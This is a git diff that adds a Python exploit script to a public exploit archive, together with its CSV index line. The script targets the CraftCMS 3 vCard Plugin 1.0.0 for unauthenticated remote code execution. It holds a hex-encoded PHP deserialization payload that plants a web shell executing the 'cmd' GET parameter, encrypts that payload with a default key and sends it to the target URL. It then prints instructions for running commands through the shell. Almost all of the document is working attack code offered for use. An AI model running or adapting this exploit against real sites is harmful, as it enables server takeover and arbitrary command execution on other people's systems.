diff --git a/exploits/php/webapps/48492.py b/exploits/php/webapps/48492.py new file mode 100755 index 000000000..6159e5414 --- /dev/null +++ b/exploits/php/webapps/48492.py @@ -0,0 +1,60 @@ +# Exploit Title: CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution +# Date: 2020-05-18 +# Exploit Author: Wade Guest +# Vendor Homepage: https://craftcms.com/ +# Software Link: https://plugins.craftcms.com/vcard +# Vulnerability Details: https://gitlab.com/wguest/craftcms-vcard-exploit +# Version: 1.0.0 +# Tested on: Ubuntu 19.10 / PHP 7.3.11 +# Description: CraftCMS 3 vCard Plugin 1.0.0 - Deserialization to RCE + +#!/usr/bin/env python3 + +import sys +import argparse +import subprocess +import requests + +DEFAULT_PAYLOAD = "613a323a7b693a373b4f3a33313a2247757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a6172223a343a7b733a34313a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720066696c656e616d65223b733a%s3a222e2f%s223b733a35323a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720073746f726553657373696f6e436f6f6b696573223b623a313b733a33363a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a617200636f6f6b696573223b613a313a7b693a303b4f3a32373a2247757a7a6c65487474705c436f6f6b69655c536574436f6f6b6965223a313a7b733a33333a220047757a7a6c65487474705c436f6f6b69655c536574436f6f6b69650064617461223b613a333a7b733a373a2245787069726573223b693a313b733a373a2244697363617264223b623a303b733a353a2256616c7565223b733a36373a223c7072653e3c3f70687020696628697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b202020207d203f3e0a223b7d7d7d733a33393a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a6172007374726963744d6f6465223b4e3b7d693a373b693a373b7d" + +def generatePayload(fname): + fname_hex = str(fname).encode('utf-8').hex() + fname_len_hex = str(len(fname)+2).encode('utf-8').hex() + payload = DEFAULT_PAYLOAD % (fname_len_hex,fname_hex) + return payload + + +def exploitCard(url,payload): + malicious_url = url + payload.decode() + r = requests.get(malicious_url,verify=False) + + return r.status_code + +def encryptPayload(payload,salt): + phpcomm = """$string=hex2bin("%s");$key = "%s";$key = md5( $key );$iv = substr( md5( $key ), 0, 16);echo rtrim(strtr(base64_encode(openssl_encrypt( $string, "aes128", md5( $key ), true, $iv )),"+/", "-_"), "=");""" % (payload,salt) + result = subprocess.run(['php','-r',phpcomm],stdout=subprocess.PIPE) + return result.stdout + + +def main(): + parser = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin") + parser.add_argument('-u',dest='url',required=True,help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=") + parser.add_argument('-s',dest='salt',default="s34s4L7",help="Security key required for encrypting payload. Defaul is 's34s4L7'") + parser.add_argument('-f',dest='fname',default="shell.php",help="File path/name to use as value in upload path: ./ . Use a PHP extension. Default value is 'shell.php'") + + if len(sys.argv)<3: + parser.print_help() + sys.exit(0) + + args = parser.parse_args() + + attPayload = generatePayload(args.fname) + + serPayload = encryptPayload(attPayload,args.salt) + if exploitCard(args.url,serPayload) == 500: + print("Deserialization has been triggered, navigate to craftCMS webroot/"+ args.fname +"\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"+ args.fname +"?cmd=ls%20-al;whoami;ip%20a\n") + + +if __name__ == '__main__': + main() + sys.exit(0) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bd76a44e3..dd4975b34 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42721,3 +42721,4 @@ id,file,description,date,author,type,platform,port 48488,exploits/php/webapps/48488.txt,"Submitty 20.04.01 - Persistent Cross-Site Scripting",2020-05-19,humblelad,webapps,php, 48489,exploits/php/webapps/48489.txt,"NukeViet VMS 4.4.00 - Cross-Site Request Forgery (Change Admin Password)",2020-05-19,JEBARAJ,webapps,php, 48490,exploits/php/webapps/48490.txt,"Victor CMS 1.0 - Authenticated Arbitrary File Upload",2020-05-19,"Kishan Lal Choudhary",webapps,php, +48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,